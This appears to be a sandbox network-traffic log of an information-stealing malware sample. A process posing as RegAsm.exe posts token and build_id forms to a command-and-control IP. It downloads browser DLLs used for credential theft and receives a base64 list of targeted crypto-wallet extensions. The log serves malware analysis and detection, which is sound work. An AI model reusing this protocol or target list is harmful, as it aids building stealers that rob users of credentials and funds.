TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49720 | 5.75.211.162 | 443 | 6508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-26 17:05:34 UTC | 277 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GIDBKKKKKFBGDGDHIDBG
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 5.75.211.162
Content-Length: 332
Connection: Keep-Alive
Cache-Control: no-cache
2024-09-26 17:05:34 UTC | 332 | OUT | Data Ascii:
------GIDBKKKKKFBGDGDHIDBG
Content-Disposition: form-data; name="token"

8501f5d5616d1cfe27783966f7e54258
------GIDBKKKKKFBGDGDHIDBG
Content-Disposition: form-data; name="build_id"

e90840a846d017e7b095f7543cdf2d15
------GIDBKKKKKFBGDGDHIDBG
Cont
2024-09-26 17:05:35 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 26 Sep 2024 17:05:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-09-26 17:05:35 UTC | 119 | IN | Data Ascii:
6c
TWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49721 | 5.75.211.162 | 443 | 6508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-26 17:05:36 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IJDBGDGCGDAKFIDGIDBF
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 5.75.211.162
Content-Length: 5765
Connection: Keep-Alive
Cache-Control: no-cache
2024-09-26 17:05:36 UTC | 5765 | OUT | Data Ascii:
------IJDBGDGCGDAKFIDGIDBF
Content-Disposition: form-data; name="token"

8501f5d5616d1cfe27783966f7e54258
------IJDBGDGCGDAKFIDGIDBF
Content-Disposition: form-data; name="build_id"

e90840a846d017e7b095f7543cdf2d15
------IJDBGDGCGDAKFIDGIDBF
Cont
2024-09-26 17:05:37 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 26 Sep 2024 17:05:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-09-26 17:05:37 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii:
2
ok
0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49722 | 5.75.211.162 | 443 | 6508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-26 17:05:37 UTC | 193 | OUT | GET /sqlp.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 5.75.211.162
Connection: Keep-Alive
Cache-Control: no-cache
2024-09-26 17:05:37 UTC | 263 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 26 Sep 2024 17:05:37 GMT
Content-Type: application/octet-stream
Content-Length: 2459136
Connection: close
Last-Modified: Thursday, 26-Sep-2024 17:05:37 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
                                                                                                      Data Ascii: td|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                      2024-09-26 17:05:38 UTC16384INData Raw: ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3
                                                                                                      Data Ascii: _^][YVt$W|$FVBhtw7t7Vg_^jjjh,g!t$
                                                                                                      2024-09-26 17:05:38 UTC16384INData Raw: 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3
                                                                                                      Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$
                                                                                                      2024-09-26 17:05:38 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81
                                                                                                      Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49723 | 5.75.211.162 | 443 | 6508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-26 17:05:40 UTC | 277 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GCBGIIECGHCAKECAFBFH
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 5.75.211.162
Content-Length: 829
Connection: Keep-Alive
Cache-Control: no-cache
2024-09-26 17:05:40 UTC | 829 | OUT | Data Ascii:
------GCBGIIECGHCAKECAFBFH
Content-Disposition: form-data; name="token"

8501f5d5616d1cfe27783966f7e54258
------GCBGIIECGHCAKECAFBFH
Content-Disposition: form-data; name="build_id"

e90840a846d017e7b095f7543cdf2d15
------GCBGIIECGHCAKECAFBFH
Cont
2024-09-26 17:05:41 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 26 Sep 2024 17:05:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-09-26 17:05:41 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49724 | 5.75.211.162 | 443 | 6508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-26 17:05:41 UTC | 277 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----EHDGIJJDGCBKFIDHIEBK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 5.75.211.162
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
2024-09-26 17:05:41 UTC | 437 | OUT | Data Ascii:
------EHDGIJJDGCBKFIDHIEBK
Content-Disposition: form-data; name="token"

8501f5d5616d1cfe27783966f7e54258
------EHDGIJJDGCBKFIDHIEBK
Content-Disposition: form-data; name="build_id"

e90840a846d017e7b095f7543cdf2d15
------EHDGIJJDGCBKFIDHIEBK
Cont
2024-09-26 17:05:42 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 26 Sep 2024 17:05:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-09-26 17:05:42 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49725 | 5.75.211.162 | 443 | 6508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-26 17:05:42 UTC | 277 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DAEBKKKEHDHDGDGCFBKJ
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 5.75.211.162
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
2024-09-26 17:05:42 UTC | 437 | OUT | Data Ascii:
------DAEBKKKEHDHDGDGCFBKJ
Content-Disposition: form-data; name="token"

8501f5d5616d1cfe27783966f7e54258
------DAEBKKKEHDHDGDGCFBKJ
Content-Disposition: form-data; name="build_id"

e90840a846d017e7b095f7543cdf2d15
------DAEBKKKEHDHDGDGCFBKJ
Cont
2024-09-26 17:05:43 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 26 Sep 2024 17:05:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-09-26 17:05:43 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49726 | 5.75.211.162 | 443 | 6508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-26 17:05:43 UTC | 196 | OUT | GET /freebl3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 5.75.211.162
Connection: Keep-Alive
Cache-Control: no-cache
2024-09-26 17:05:44 UTC | 262 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 26 Sep 2024 17:05:44 GMT
Content-Type: application/octet-stream
Content-Length: 685392
Connection: close
Last-Modified: Thursday, 26-Sep-2024 17:05:44 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49727 | 5.75.211.162 | 443 | 6508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-26 17:05:45 UTC | 196 | OUT | GET /mozglue.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 5.75.211.162
Connection: Keep-Alive
Cache-Control: no-cache
2024-09-26 17:05:46 UTC | 262 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 26 Sep 2024 17:05:45 GMT
Content-Type: application/octet-stream
Content-Length: 608080
Connection: close
Last-Modified: Thursday, 26-Sep-2024 17:05:45 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49728 | 5.75.211.162 | 443 | 6508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-26 17:05:47 UTC | 197 | OUT | GET /msvcp140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 5.75.211.162
Connection: Keep-Alive
Cache-Control: no-cache
2024-09-26 17:05:47 UTC | 262 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 26 Sep 2024 17:05:47 GMT
Content-Type: application/octet-stream
Content-Length: 450024
Connection: close
Last-Modified: Thursday, 26-Sep-2024 17:05:47 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49729 | 5.75.211.162 | 443 | 6508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-26 17:05:49 UTC | 197 | OUT | GET /softokn3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 5.75.211.162
Connection: Keep-Alive
Cache-Control: no-cache
2024-09-26 17:05:49 UTC | 262 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 26 Sep 2024 17:05:49 GMT
Content-Type: application/octet-stream
Content-Length: 257872
Connection: close
Last-Modified: Thursday, 26-Sep-2024 17:05:49 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
                                                                                                      Data Ascii: wu ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZ
                                                                                                      2024-09-26 17:05:49 UTC16384INData Raw: 37 ff 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00
                                                                                                      Data Ascii: 7uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
                                                                                                      2024-09-26 17:05:49 UTC16384INData Raw: 40 00 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15
                                                                                                      Data Ascii: @]]USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4
                                                                                                      2024-09-26 17:05:49 UTC16384INData Raw: e4 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25
                                                                                                      Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 49730 | 5.75.211.162 | 443 | 6508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-26 17:05:50 UTC | 201 | OUT | GET /vcruntime140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 5.75.211.162
Connection: Keep-Alive
Cache-Control: no-cache
2024-09-26 17:05:50 UTC | 261 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 26 Sep 2024 17:05:50 GMT
Content-Type: application/octet-stream
Content-Length: 80880
Connection: close
Last-Modified: Thursday, 26-Sep-2024 17:05:50 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 49731 | 5.75.211.162 | 443 | 6508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-26 17:05:51 UTC | 193 | OUT | GET /nss3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 5.75.211.162
Connection: Keep-Alive
Cache-Control: no-cache
2024-09-26 17:05:52 UTC | 263 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 26 Sep 2024 17:05:52 GMT
Content-Type: application/octet-stream
Content-Length: 2046288
Connection: close
Last-Modified: Thursday, 26-Sep-2024 17:05:52 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 49732 | 5.75.211.162 | 443 | 6508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-26 17:05:54 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HJDAKFBFBFBAAAAAEBKJ
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 5.75.211.162
Content-Length: 1145
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                      2024-09-26 17:05:54 UTC1145OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 41 4b 46 42 46 42 46 42 41 41 41 41 41 45 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 30 31 66 35 64 35 36 31 36 64 31 63 66 65 32 37 37 38 33 39 36 36 66 37 65 35 34 32 35 38 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 41 4b 46 42 46 42 46 42 41 41 41 41 41 45 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 41 4b 46 42 46 42 46 42 41 41 41 41 41 45 42 4b 4a 0d 0a 43 6f 6e 74
                                                                                                      Data Ascii: ------HJDAKFBFBFBAAAAAEBKJContent-Disposition: form-data; name="token"8501f5d5616d1cfe27783966f7e54258------HJDAKFBFBFBAAAAAEBKJContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------HJDAKFBFBFBAAAAAEBKJCont
2024-09-26 17:05:55 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 26 Sep 2024 17:05:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
                                                                                                      2024-09-26 17:05:55 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 49733 | 5.75.211.162 | 443 | 6508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-26 17:05:56 UTC | 277 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GCGCBAECFCAKKEBFCFII
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 5.75.211.162
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                      2024-09-26 17:05:56 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 43 42 41 45 43 46 43 41 4b 4b 45 42 46 43 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 30 31 66 35 64 35 36 31 36 64 31 63 66 65 32 37 37 38 33 39 36 36 66 37 65 35 34 32 35 38 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 43 42 41 45 43 46 43 41 4b 4b 45 42 46 43 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 43 42 41 45 43 46 43 41 4b 4b 45 42 46 43 46 49 49 0d 0a 43 6f 6e 74
                                                                                                      Data Ascii: ------GCGCBAECFCAKKEBFCFIIContent-Disposition: form-data; name="token"8501f5d5616d1cfe27783966f7e54258------GCGCBAECFCAKKEBFCFIIContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------GCGCBAECFCAKKEBFCFIICont
                                                                                                      2024-09-26 17:05:56 UTC158INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Thu, 26 Sep 2024 17:05:56 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 49734 | 5.75.211.162 | 443 | 6508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-26 17:05:57 UTC | 277 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DHIDHIEGIIIECAKEBFBA
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 5.75.211.162
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-09-26 17:05:57 UTC | 331 | OUT | Data Ascii: ------DHIDHIEGIIIECAKEBFBAContent-Disposition: form-data; name="token"8501f5d5616d1cfe27783966f7e54258------DHIDHIEGIIIECAKEBFBAContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------DHIDHIEGIIIECAKEBFBACont
2024-09-26 17:05:58 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 26 Sep 2024 17:05:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.5 | 49735 | 5.75.211.162 | 443 | 6508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-26 17:05:59 UTC | 277 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----BAKEBAFIIECBGCAAAAFC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 5.75.211.162
Content-Length: 461
Connection: Keep-Alive
Cache-Control: no-cache
2024-09-26 17:05:59 UTC | 461 | OUT | Data Ascii: ------BAKEBAFIIECBGCAAAAFCContent-Disposition: form-data; name="token"8501f5d5616d1cfe27783966f7e54258------BAKEBAFIIECBGCAAAAFCContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------BAKEBAFIIECBGCAAAAFCCont
2024-09-26 17:05:59 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 26 Sep 2024 17:05:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-09-26 17:05:59 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.5 | 49736 | 5.75.211.162 | 443 | 6508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
